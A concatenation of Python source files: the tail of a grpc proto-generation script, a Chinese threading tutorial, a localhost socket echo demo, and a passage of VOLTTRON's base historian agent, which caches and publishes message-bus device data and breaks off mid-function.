build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s', install_path)
try:
start = time.time()
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install',
'--target', install_path, '--build', build_path,
'--upgrade', GRPC_TOOLS])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.', time.time() - start)
finally:
sys.stderr.flush()
shutil.rmtree(build_path, ignore_errors=True)
sys.path.append(install_path)
try:
generate_proto_files()
finally:
sys.stderr.flush()
if __name__ == '__main__':
generate_proto_files(force=True)
|
day27-2 多线程的使用.py
|
# 1.导入线程模块
import threading
import time
def sing():
# 获取当前线程
current_thread = threading.current_thread()
print(current_thread)
for i in range(3):
print("sing...")
time.sleep(0.2)
def dance():
# 获取当前线程
current_thread = threading.current_thread()
print(current_thread)
for i in range(3):
print("dance...")
time.sleep(0.2)
if __name__ == '__main__':
# 获取当前线程
current_thread = threading.current_thread()
print(current_thread)
# 2.创建子线程
sing_thread = threading.Thread(target=sing)
dance_thread = threading.Thread(target=dance)
# 3.启动子线程对应任务
sing_thread.start()
dance_thread.start()
|
recvSend.py
|
# -*- coding: utf-8 -*-
from socket import *
import threading
import time
buffer_size = 2048
def server(host, port):
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(10)
server_socket, address = server_socket.accept()
while True:
data = server_socket.recv(buffer_size)
if len(data):
print "server recv:" + str(data)
data = server_socket.send(data)
time.sleep(1)
def client(ip, port):
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((ip, port))
for i in range(10):
try:
data = "send number is " + str(i)
data = client_socket.send(data)
data = client_socket.recv(buffer_size)
if len(data):
print "client recv:" + str(data)
time.sleep(1)
except:
pass
if __name__ == "__main__":
print("start recv and send...")
#t = threading.Thread(target=server, args=('0.0.0.0', 8102))
#t.start()
client('localhost', 8102)
|
base_historian.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""
=====================
Historian Development
=====================
Support for storing and retrieving historical device and analysis data
published to the message bus is handled with Historian Agents. If a new type
of data store or a new way of storing data is desired a new type of Historian
Agent should created.
Historian Agents are implemented by subclassing :py:class:`BaseHistorian`.
Agents that need short term storage of device data should subscribe to device
data and use internal data structures for storage. Agents which need long
term Historical data that predates the startup of the Agent should interact
with a Historian Agent in order to obtain that data as needed.
While it is possible to create an Agent from scratch which handles gathering
and storing device data it will miss out on the benefits of creating a proper
Historian Agent that subclassing :py:class:`BaseHistorian`.
The :py:class:`BaseHistorian` class provides the following features:
- A separate thread for all communication with a data store removing the need
to use or implement special libraries to work with gevent.
- Automatically subscribe to and process device publishes.
- Automatically backup data retrieved off the message bus to a disk cache.
Cached data will only be removed once it is successfully published to a data
store.
- Existing Agents that publish analytical data for storage or query for
historical data will be able to use the new Historian without any code
changes.
- Data can be graphed in VOLTTRON Central.
Creating a New Historian
------------------------
To create a new Historian create a new Agent that subclasses
:py:class:`BaseHistorian`. :py:class:`BaseHistorian` inherits from
:py:class:`volttron.platform.vip.agent.Agent` so including it in the class
parents is not needed.
The new Agent must implement the following methods:
- :py:meth:`BaseHistorianAgent.publish_to_historian`
- :py:meth:`BaseQueryHistorianAgent.query_topic_list`
- :py:meth:`BaseQueryHistorianAgent.query_historian`
- :py:meth:`BaseQueryHistorianAgent.query_topics_metadata`
If this historian has a corresponding AggregateHistorian
(see :py:class:`AggregateHistorian`) implement the following method in addition
to the above ones:
- :py:meth:`BaseQueryHistorianAgent.query_aggregate_topics`
While not required this method may be overridden as needed:
- :py:meth:`BaseHistorianAgent.historian_setup`
Optionally a Historian Agent can inherit from :py:class:`BaseHistorianAgent`
instead of :py:class:`BaseHistorian` if support for querying data is not
needed for the data store. If this route is taken then VOLTTRON Central
will not be able to graph data from the store. It is possible to run more than
one Historian agent at a time to store data in more than one place. If needed
one can be used to allow querying while another is used to put data in the
desired store that does not allow querying.
Historian Execution Flow
------------------------
At startup the :py:class:`BaseHistorian` class starts a new thread to handle
all data caching and publishing (the publishing thread). The main thread then
subscribes to all Historian related topics on the message bus. Whenever
subscribed data comes in it is published to a Queue to be be processed by the
publishing thread as soon as possible.
At startup the publishing thread calls two methods:
- :py:meth:`BaseHistorianAgent.historian_setup` to give the implemented
historian a chance to setup any connections in the thread. This method can
also be used to load an initial data into memory
The process thread then enters the following logic loop:
::
Wait for data to appear in the Queue. Proceed if data appears or a
`retry_period` time elapses.
If new data appeared in Queue:
Save new data to cache.
While data is in cache:
Publish data to store by calling
:py:meth:`BaseHistorianAgent.publish_to_historian`.
If no data was published:
Go back to start and check Queue for data.
Remove published data from cache.
If we have been publishing for `max_time_publishing`:
Go back to start and check Queue for data.
The logic will also forgo waiting the `retry_period` for new data to appear
when checking for new data if publishing has been successful and there is
still data in the cache to be publish. If
:py:meth:`BaseHistorianAgent.historian_setup` throw exception
and an alert is raised but the process loop continues to wait for data and
caches it. The process loop will periodically try to call the two methods
again until successful. Exception thrown by
:py:meth:`BaseHistorianAgent.publish_to_historian` would also raise alerts
and process loop will continue to back up data.
Storing Data
------------
The :py:class:`BaseHistorian` will call
:py:meth:`BaseHistorianAgent.publish_to_historian` as the time series data
becomes available. Data is batched in a groups up to `submit_size_limit`.
After processing the list or individual items in the list
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` to report an individual point
of data was published or :py:meth:`BaseHistorianAgent.report_all_handled` to
report that everything from the batch was successfully published. This tells
the :py:class:`BaseHistorianAgent` class what to remove from the cache and if
any publishing was successful.
The `to_publish_list` argument of
:py:meth:`BaseHistorianAgent.publish_to_historian` is a list of records that
takes the following form:
.. code-block:: python
[
{
'_id': 1,
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'_id': 2,
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
As records are published to the data store
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` with the record or list of
records that was published or :py:meth:`BaseHistorianAgent.report_all_handled`
if everything was published.
Querying Data
-------------
- When an request is made to query data the
:py:meth:`BaseQueryHistorianAgent.query_historian` method is called.
- When a request is made for the list of topics in the store
:py:meth:`BaseQueryHistorianAgent.query_topic_list` will be called.
- When a request is made to get the metadata of a topic
:py:meth:`BaseQueryHistorianAgent.query_topics_metadata` will be called.
- When a request is made for the list of aggregate topics available
:py:meth:`BaseQueryHistorianAgent.query_aggregate_topics` will be called
Other Notes
-----------
Implemented Historians must be tolerant to receiving the same data for
submission twice. While very rare, it is possible for a Historian to be
forcibly shutdown after data is published but before it is removed from the
cache. When restarted the :py:class:`BaseHistorian` will submit
the same date over again.
"""
import logging
import sqlite3
import threading
import weakref
from queue import Queue, Empty
from abc import abstractmethod
from collections import defaultdict
from datetime import datetime, timedelta
from threading import Thread
import gevent
from gevent import get_hub
from functools import wraps
import pytz
import re
from dateutil.parser import parse
from volttron.platform.agent.base_aggregate_historian import AggregateHistorian
from volttron.platform.agent.utils import process_timestamp, \
fix_sqlite3_datetime, get_aware_utc_now, parse_timestamp_string
from volttron.platform.messaging import topics, headers as headers_mod
from volttron.platform.vip.agent import *
from volttron.platform.vip.agent import compat
from volttron.platform.vip.agent.subsystems.query import Query
from volttron.platform.async_ import AsyncCall
from volttron.platform.messaging.health import (STATUS_BAD,
STATUS_UNKNOWN,
STATUS_GOOD,
STATUS_STARTING,
Status)
try:
import ujson
from volttron.platform.jsonapi import dumps as _dumps, loads as _loads
def dumps(data):
try:
return ujson.dumps(data)
except Exception:
return _dumps(data)
def loads(data_string):
try:
return ujson.loads(data_string, precise_float=True)
except Exception:
return _loads(data_string)
except ImportError:
from volttron.platform.jsonapi import dumps, loads
from volttron.platform.agent import utils
_log = logging.getLogger(__name__)
# Build the parser
time_parser = None
ACTUATOR_TOPIC_PREFIX_PARTS = len(topics.ACTUATOR_VALUE.split('/'))
ALL_REX = re.compile('.*/all$')
# Register a better datetime parser in sqlite3.
fix_sqlite3_datetime()
def add_timing_data_to_header(headers, agent_id, phase):
if "timing_data" not in headers:
headers["timing_data"] = timing_data = {}
else:
timing_data = headers["timing_data"]
if agent_id not in timing_data:
timing_data[agent_id] = agent_timing_data = {}
else:
agent_timing_data = timing_data[agent_id]
agent_timing_data[phase] = utils.format_timestamp(utils.get_aware_utc_now())
values = list(agent_timing_data.values())
if len(values) < 2:
return 0.0
# Assume 2 phases and proper format.
time1 = datetime.strptime(values[0][11:26], "%H:%M:%S.%f")
time2 = datetime.strptime(values[1][11:26], "%H:%M:%S.%f")
return abs((time1 - time2).total_seconds())
STATUS_KEY_BACKLOGGED = "backlogged"
STATUS_KEY_CACHE_COUNT = "cache_count"
STATUS_KEY_PUBLISHING = "publishing"
STATUS_KEY_CACHE_FULL = "cache_full"
STATUS_KEY_TIME_ERROR = "records_with_invalid_timestamp"
STATUS_KEY_CACHE_ONLY = "cache_only_enabled"
class BaseHistorianAgent(Agent):
"""
This is the base agent for historian Agents.
It automatically subscribes to all device publish topics.
Event processing occurs in its own thread as to not block the main
thread. Both the historian_setup and publish_to_historian happen in
the same thread.
By default the base historian will listen to 4 separate root topics (
datalogger/*, record/*, analysis/*, and device/*.
Messages published to datalogger will be assumed to be timepoint data that
is composed of units and specific types with the assumption that they have
the ability to be graphed easily. Messages published to devices
are data that comes directly from drivers. Data sent to analysis/* topics
is result of analysis done by applications. The format of data sent to
analysis/* topics is similar to data sent to device/* topics.
Messages that are published to record will be handled as string data and
can be customized to the user specific situation. Refer to
`Historian-Topic-Syntax
</core_services/historians/Historian-Topic-Syntax.html>`_ for data syntax
This base historian will cache all received messages to a local database
before publishing it to the historian. This allows recovery for
unexpected happenings before the successful writing of data to the
historian.
"""
def __init__(self,
retry_period=300.0,
submit_size_limit=1000,
max_time_publishing=30.0,
backup_storage_limit_gb=None,
backup_storage_report=0.9,
topic_replace_list=[],
gather_timing_data=False,
readonly=False,
process_loop_in_greenlet=False,
capture_device_data=True,
capture_log_data=True,
capture_analysis_data=True,
capture_record_data=True,
message_publish_count=10000,
history_limit_days=None,
storage_limit_gb=None,
sync_timestamp=False,
custom_topics={},
device_data_filter={},
all_platforms=False,
time_tolerance=None,
time_tolerance_topics=None,
cache_only_enabled=False,
**kwargs):
super(BaseHistorianAgent, self).__init__(**kwargs)
# This should resemble a dictionary that has key's from and to which
# will be replaced within the topics before it's stored in the
# cache database
self._process_loop_in_greenlet = process_loop_in_greenlet
self._topic_replace_list = topic_replace_list
self._async_call = AsyncCall()
_log.info('Topic string replace list: {}'
.format(self._topic_replace_list))
self.gather_timing_data = bool(gather_timing_data)
self._backup_storage_limit_gb = backup_storage_limit_gb
self._backup_storage_report = backup_storage_report
self._retry_period = float(retry_period)
self._submit_size_limit = int(submit_size_limit)
self._max_time_publishing = float(max_time_publishing)
self._history_limit_days = history_limit_days
self._storage_limit_gb = storage_limit_gb
self._successful_published = set()
# Remove the need to reset subscriptions to eliminate possible data
# loss at config change.
self._current_subscriptions = set()
self._topic_replace_map = {}
self._event_queue = gevent.queue.Queue() if self._process_loop_in_greenlet else Queue()
self._readonly = bool(readonly)
self._stop_process_loop = False
self._setup_failed = False
self._process_thread = None
self._message_publish_count = int(message_publish_count)
self.no_insert = False
self.no_query = False
self.instance_name = None
self._sync_timestamp = sync_timestamp
self._current_status_context = {
STATUS_KEY_CACHE_COUNT: 0,
STATUS_KEY_BACKLOGGED: False,
STATUS_KEY_PUBLISHING: True,
STATUS_KEY_CACHE_FULL: False,
STATUS_KEY_CACHE_ONLY: False
}
self._all_platforms = bool(all_platforms)
self._time_tolerance = float(time_tolerance) if time_tolerance else None
if self._time_tolerance is not None:
if time_tolerance_topics is None:
time_tolerance_topics = ["devices"]
elif not isinstance(time_tolerance_topics, list):
raise ValueError(f"time_tolerance_topic should a list of topics. Got value({time_tolerance_topics}) of "
f"type {type(time_tolerance_topics)}")
self._time_tolerance_topics = time_tolerance_topics
if str(cache_only_enabled) in ('True', 'False'):
self._cache_only_enabled = cache_only_enabled
self._current_status_context[STATUS_KEY_CACHE_ONLY] = cache_only_enabled
else:
raise ValueError(f"cache_only_enabled should be either True or False")
self._default_config = {
"retry_period":self._retry_period,
"submit_size_limit": self._submit_size_limit,
"max_time_publishing": self._max_time_publishing,
"backup_storage_limit_gb": self._backup_storage_limit_gb,
"backup_storage_report": self._backup_storage_report,
"topic_replace_list": self._topic_replace_list,
"gather_timing_data": self.gather_timing_data,
"readonly": self._readonly,
"capture_device_data": capture_device_data,
"capture_log_data": capture_log_data,
"capture_analysis_data": capture_analysis_data,
"capture_record_data": capture_record_data,
"message_publish_count": self._message_publish_count,
"storage_limit_gb": storage_limit_gb,
"history_limit_days": history_limit_days,
"custom_topics": custom_topics,
"device_data_filter": device_data_filter,
"all_platforms": self._all_platforms,
"time_tolerance": self._time_tolerance,
"time_tolerance_topics": self._time_tolerance_topics,
"cache_only_enabled": self._cache_only_enabled
}
self.vip.config.set_default("config", self._default_config)
self.vip.config.subscribe(self._configure, actions=["NEW", "UPDATE"], pattern="config")
def update_default_config(self, config):
"""
May be called by historians to add to the default configuration for its
own use.
"""
self._default_config.update(config)
self.vip.config.set_default("config", self._default_config)
def start_process_thread(self):
if self._process_loop_in_greenlet:
self._process_thread = self.core.spawn(self._process_loop)
self._process_thread.start()
_log.debug("Process greenlet started.")
else:
self._process_thread = Thread(target=self._process_loop)
self._process_thread.daemon = True # Don't wait on thread to exit.
self._process_thread.start()
_log.debug("Process thread started.")
def manage_db_size(self, history_limit_timestamp, storage_limit_gb):
"""
Called in the process thread after data is published.
This can be overridden in historian implementations
to apply the storage_limit_gb and history_limit_days
settings to the storage medium.
:param history_limit_timestamp: remove all data older than this timestamp
:param storage_limit_gb: remove oldest data until database is smaller than this value.
"""
pass
def stop_process_thread(self):
_log.debug("Stopping the process loop.")
if self._process_thread is None:
return
# Tell the loop it needs to die.
self._stop_process_loop = True
# Wake the loop.
self._event_queue.put(None)
# 9 seconds as configuration timeout is 10 seconds.
self._process_thread.join(9.0)
# Greenlets have slightly different API than threads in this case.
if self._process_loop_in_greenlet:
if not self._process_thread.ready():
_log.error("Failed to stop process greenlet during reconfiguration!")
elif self._process_thread.is_alive():
_log.error("Failed to stop process thread during reconfiguration!")
self._process_thread = None
_log.debug("Process loop stopped.")
def _configure(self, config_name, action, contents):
self.vip.heartbeat.start()
config = self._default_config.copy()
config.update(contents)
try:
topic_replace_list = list(config.get("topic_replace_list", []))
gather_timing_data = bool(config.get("gather_timing_data", False))
backup_storage_limit_gb = config.get("backup_storage_limit_gb")
if backup_storage_limit_gb is not None:
backup_storage_limit_gb = float(backup_storage_limit_gb)
backup_storage_report = config.get("backup_storage_report", 0.9)
if backup_storage_report:
backup_storage_report = float(backup_storage_report)
backup_storage_report = min(1.0, backup_storage_report)
backup_storage_report = max(0.0001, backup_storage_report)
else:
backup_storage_report = 0.9
retry_period = float(config.get("retry_period", 300.0))
storage_limit_gb = config.get("storage_limit_gb")
if storage_limit_gb:
storage_limit_gb = float(storage_limit_gb)
history_limit_days = config.get("history_limit_days")
if history_limit_days:
history_limit_days = float(history_limit_days)
submit_size_limit = int(config.get("submit_size_limit", 1000))
max_time_publishing = float(config.get("max_time_publishing", 30.0))
readonly = bool(config.get("readonly", False))
message_publish_count = int(config.get("message_publish_count", 10000))
all_platforms = bool(config.get("all_platforms", False))
time_tolerance = config.get("time_tolerance")
time_tolerance_topics = config.get("time_tolerance_topics")
time_tolerance = float(time_tolerance) if time_tolerance else None
if time_tolerance is not None:
if time_tolerance_topics is None:
time_tolerance_topics = ["devices"]
elif not isinstance(time_tolerance_topics, list):
raise ValueError(
f"time_tolerance_topic should a list of topics. Got value({time_tolerance_topics}) of "
f"type {type(time_tolerance_topics)}")
cache_only_enabled = config.get("cache_only_enabled", False)
if str(cache_only_enabled) not in ('True', 'False'):
raise ValueError(f"cache_only_enabled should be either True or False")
self._cache_only_enabled = cache_only_enabled
self._current_status_context[STATUS_KEY_CACHE_ONLY] = cache_only_enabled
self._time_tolerance_topics = time_tolerance_topics
except ValueError as e:
self._backup_storage_report = 0.9
_log.exception("Failed to load base historian settings. Settings not applied!")
return
query = Query(self.core)
self.instance_name = query.query('instance-name').get()
# Reset replace map.
self._topic_replace_map = {}
self._topic_replace_list = topic_replace_list
_log.info('Topic string replace list: {}'
.format(self._topic_replace_list))
self.gather_timing_data = gather_timing_data
self._backup_storage_limit_gb = backup_storage_limit_gb
self._backup_storage_report = backup_storage_report
self._retry_period = retry_period
self._submit_size_limit = submit_size_limit
self._max_time_publishing = timedelta(seconds=max_time_publishing)
self._history_limit_days = timedelta(days=history_limit_days) if history_limit_days else None
self._storage_limit_gb = storage_limit_gb
self._all_platforms = all_platforms
self._readonly = readonly
self._message_publish_count = message_publish_count
self._time_tolerance = time_tolerance
self._time_tolerance_topics = time_tolerance_topics
custom_topics_list = []
for handler, topic_list in config.get("custom_topics", {}).items():
if handler == "capture_device_data":
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_device_data))
elif handler == "capture_log_data":
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_log_data))
elif handler == "capture_analysis_data":
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_analysis_data))
else:
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_record_data))
self._update_subscriptions(bool(config.get("capture_device_data", True)),
bool(config.get("capture_log_data", True)),
bool(config.get("capture_analysis_data", True)),
bool(config.get("capture_record_data", True)),
custom_topics_list)
self.stop_process_thread()
self._device_data_filter = config.get("device_data_filter")
try:
self.configure(config)
except Exception as e:
_log.error("Failed to load historian settings.{}".format(e))
self.start_process_thread()
def _update_subscriptions(self, capture_device_data,
capture_log_data,
capture_analysis_data,
capture_record_data,
custom_topics_list):
subscriptions = [
(capture_device_data, topics.DRIVER_TOPIC_BASE, self._capture_device_data),
(capture_log_data, topics.LOGGER_BASE, self._capture_log_data),
(capture_analysis_data, topics.ANALYSIS_TOPIC_BASE, self._capture_analysis_data),
(capture_record_data, topics.RECORD_BASE, self._capture_record_data)
]
subscriptions.extend(custom_topics_list)
for should_sub, prefix, cb in subscriptions:
if should_sub and not self._readonly:
if prefix not in self._current_subscriptions:
_log.debug("subscribing to {}".format(prefix))
try:
self.vip.pubsub.subscribe(peer='pubsub',
prefix=prefix,
callback=cb,
all_platforms=self._all_platforms).get(timeout=5.0)
self._current_subscriptions.add(prefix)
except (gevent.Timeout, Exception) as e:
_log.error("Failed to subscribe to {}: {}".format(prefix, repr(e)))
else:
if prefix in self._current_subscriptions:
_log.debug("unsubscribing from {}".format(prefix))
try:
self.vip.pubsub.unsubscribe(peer='pubsub',
prefix=prefix,
callback=cb).get(timeout=5.0)
self._current_subscriptions.remove(prefix)
except (gevent.Timeout, Exception) as e:
_log.error("Failed to unsubscribe from {}: {}".format(prefix, repr(e)))
def configure(self, configuration):
"""Optional, may be implemented by a concrete implementation to add support for the configuration store.
Values should be stored in this function only.
The process thread is stopped before this is called if it is running. It is started afterwards.
`historian_setup` is called after this is called. """
pass
@RPC.export
def insert(self, records):
"""RPC method to allow remote inserts to the local cache
:param records: List of items to be added to the local event queue
:type records: list of dictionaries
"""
# This is for Forward Historians which do not support data mover inserts.
if self.no_insert:
raise RuntimeError("Insert not supported by this historian.")
rpc_peer = self.vip.rpc.context.vip_message.peer
_log.debug("insert called by {} with {} records".format(rpc_peer, len(records)))
for r in records:
topic = r['topic']
headers = r['headers']
message = r['message']
capture_func = None
if topic.startswith(topics.DRIVER_TOPIC_BASE):
capture_func = self._capture_device_data
elif topic.startswith(topics.LOGGER_BASE):
capture_func = self._capture_log_data
elif topic.startswith(topics.ANALYSIS_TOPIC_BASE):
capture_func = self._capture_analysis_data
elif topic.startswith(topics.RECORD_BASE):
capture_func = self._capture_record_data
if capture_func:
capture_func(peer=None, sender=None, bus=None,
topic=topic, headers=headers, message=message)
else:
_log.error("Unrecognized topic in insert call: {}".format(topic))
@Core.receiver("onstop")
def stopping(self, sender, **kwargs):
"""
Release subscription to the message bus because we are no longer able
to respond to messages now.
"""
if not self._readonly:
try:
# stop the process loop thread/greenlet before exiting
self.stop_process_thread()
# unsubscribes to all topics that we are subscribed to.
self.vip.pubsub.unsubscribe(peer='pubsub', prefix=None,
callback=None)
except KeyError:
# means that the agent didn't start up properly so the pubsub
# subscriptions never got finished.
pass
def parse_table_def(self, tables_def):
default_table_def = {"table_prefix": "",
"data_table": "data",
"topics_table": "topics",
"meta_table": "meta"}
if not tables_def:
tables_def = default_table_def
else:
default_table_def.update(tables_def)
tables_def = default_table_def
table_names = dict(tables_def)
table_prefix = tables_def.get('table_prefix', None)
table_prefix = table_prefix + "_" if table_prefix else ""
if table_prefix:
for key, value in list(table_names.items()):
table_names[key] = table_prefix + table_names[key]
table_names["agg_topics_table"] = table_prefix + \
"aggregate_" + tables_def["topics_table"]
table_names["agg_meta_table"] = table_prefix + \
"aggregate_" + tables_def["meta_table"]
return tables_def, table_names
def get_renamed_topic(self, input_topic):
"""
replace topic name based on configured topic replace list, is any
:param input_topic:
:return:
"""
output_topic = input_topic
input_topic_lower = input_topic.lower()
# Only if we have some topics to replace.
if self._topic_replace_list:
# if we have already cached the topic then return it.
if input_topic_lower in self._topic_replace_map:
output_topic = self._topic_replace_map[input_topic_lower]
else:
self._topic_replace_map[input_topic_lower] = input_topic
temptopics = {}
for x in self._topic_replace_list:
if x['from'].lower() in input_topic_lower:
# this allows multiple things to be replaced from
# from a given topic.
new_topic = temptopics.get(input_topic_lower,
input_topic)
# temptopics[input_topic] = new_topic.replace(
# x['from'], x['to'])
temptopics[input_topic_lower] = re.compile(
re.escape(x['from']), re.IGNORECASE).sub(x['to'],
new_topic)
for k, v in temptopics.items():
self._topic_replace_map[k] = v
output_topic = self._topic_replace_map[input_topic_lower]
_log.debug("Output topic after replacements {}".format(output_topic))
return output_topic
def does_time_exceed_tolerance(self, topic, utc_timestamp):
if self._time_tolerance:
# If time tolerance is set, and it needs to be checked for this topic
# compare the incoming timestamp with the current time.
if topic.startswith(tuple(self._time_tolerance_topics)):
return abs(get_aware_utc_now() - utc_timestamp).seconds > self._time_tolerance
return False
def is_cache_only_enabled(self):
return self._cache_only_enabled
def _capture_record_data(self, peer, sender, bus, topic, headers,
message):
# _log.debug('Capture record data {}'.format(topic))
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
timestamp_string = headers.get(headers_mod.DATE, None)
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
headers['time_error'] = self.does_time_exceed_tolerance(topic, timestamp)
if sender == 'pubsub.compat':
message = compat.unpack_legacy_message(headers, message)
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
self._event_queue.put(
{'source': 'record',
'topic': topic,
'readings': [(timestamp, message)],
'meta': {},
'headers': headers})
def _capture_log_data(self, peer, sender, bus, topic, headers, message):
"""Capture log data and submit it to be published by a historian."""
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
try:
# 2.0 agents compatability layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
data = compat.unpack_legacy_message(headers, message)
else:
data = message
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
for point, item in data.items():
if 'Readings' not in item or 'Units' not in item:
_log.error("logging request for {topic} missing Readings "
"or Units".format(topic=topic))
continue
units = item['Units']
dtype = item.get('data_type', 'float')
tz = item.get('tz', None)
if dtype == 'double':
dtype = 'float'
meta = {'units': units, 'type': dtype}
readings = item['Readings']
if not isinstance(readings, list):
readings = [(get_aware_utc_now(), readings)]
elif isinstance(readings[0], str):
my_ts, my_tz = process_timestamp(readings[0], topic)
headers['time_error'] = self.does_time_exceed_tolerance(topic, my_ts)
readings = [(my_ts, readings[1])]
if tz:
meta['tz'] = tz
elif my_tz:
meta['tz'] = my_tz.zone
self._event_queue.put({'source': 'log',
'topic': topic + '/' + point,
'readings': readings,
'meta': meta,
'headers': headers})
def _capture_device_data(self, peer, sender, bus, topic, headers,
message):
"""Capture device data and submit it to be published by a historian.
Filter out only the */all topics for publishing to the historian.
"""
if not ALL_REX.match(topic):
return
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
# Because of the above if we know that all is in the topic so
# we strip it off to get the base device
parts = topic.split('/')
device = '/'.join(parts[1:-1])
# msg = [{data},{meta}] format
msg = [{}, {}]
try:
# If the filter is empty pass all data.
if self._device_data_filter:
for _filter, point_list in self._device_data_filter.items():
# If filter is not empty only topics that contain the key
# will be kept.
if _filter in device:
for point in point_list:
# devices all publish
if isinstance(message, list):
# Only points in the point list will be added to the message payload
if point in message[0]:
msg[0][point] = message[0][point]
msg[1][point] = message[1][point]
else:
# other devices publish (devices/campus/building/device/point)
msg = None
if point in device:
msg = message
# if the point in in the parsed topic then exit for loop
break
if (isinstance(msg, list) and not msg[0]) or \
(isinstance(msg, (float, int, str)) and msg is None):
_log.debug("Topic: {} - is not in configured to be stored".format(topic))
return
else:
msg = message
except Exception as e:
_log.debug("Error handling device_data_filter. {}".format(e))
msg = message
self._capture_data(peer, sender, bus, topic, headers, msg, device)
def _capture_analysis_data(self, peer, sender, bus, topic, headers,
message):
"""Capture analaysis data and submit it to be published by a historian.
Filter out all but the all topics
"""
# Anon the topic.
topic = self.get_renamed_topic(topic)
if topic.endswith('/'):
topic = topic[:-1]
if not topic.endswith('all'):
topic += '/all'
parts = topic.split('/')
# strip off the first part of the topic.
device = '/'.join(parts[1:-1])
self._capture_data(peer, sender, bus, topic, headers, message, device)
def _capture_data(self, peer, sender, bus, topic, headers, message,
device):
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
timestamp_string = headers.get(headers_mod.SYNC_TIMESTAMP if self._sync_timestamp else headers_mod.TIMESTAMP,
headers.get(headers_mod.DATE))
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
headers['time_error'] = self.does_time_exceed_tolerance(topic, timestamp)
try:
# 2.0 agents compatability layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
message = compat.unpack_legacy_message(headers, message)
if isinstance(message, dict):
values = message
else:
values = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
except Exception as e:
_log.exception(e)
return
meta = {}
if not isinstance(message, dict):
if len(message) == 2:
meta = message[1]
if topic.startswith('analysis'):
source = 'analysis'
else:
source = 'scrape'
# _log.debug(
# "Queuing {topic} from {source} for publish".format(topic=topic,
# source=source))
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
for key, value in values.items():
point_topic = device + '/' + key
self._event_queue.put({'source': source,
'topic': point_topic,
'readings': [(timestamp, value)],
'meta': meta.get(key, {}),
'headers': headers})
def _capture_actuator_data(self, topic, headers, message, match):
"""Capture actuation data and submit it to be published by a historian.
"""
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
timestamp_string = headers.get('time')
if timestamp_string is None:
_log.error(
"message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse(timestamp_string)
except (ValueError, TypeError) as e:
_log.error("message for {} bad timetamp string: "
"{}".format(topic, timestamp_string))
return
parts = topic.split('/')
topic = '/'.join(parts[ACTUATOR_TOPIC_PREFIX_PARTS:])
try:
value = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
source = 'actuator'
# _log.debug(
# "Queuing {topic} from {source} for publish".format(topic=topic,
# source=source))
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
self._event_queue.put({'source': source,
'topic': topic,
'readings': [timestamp, value],
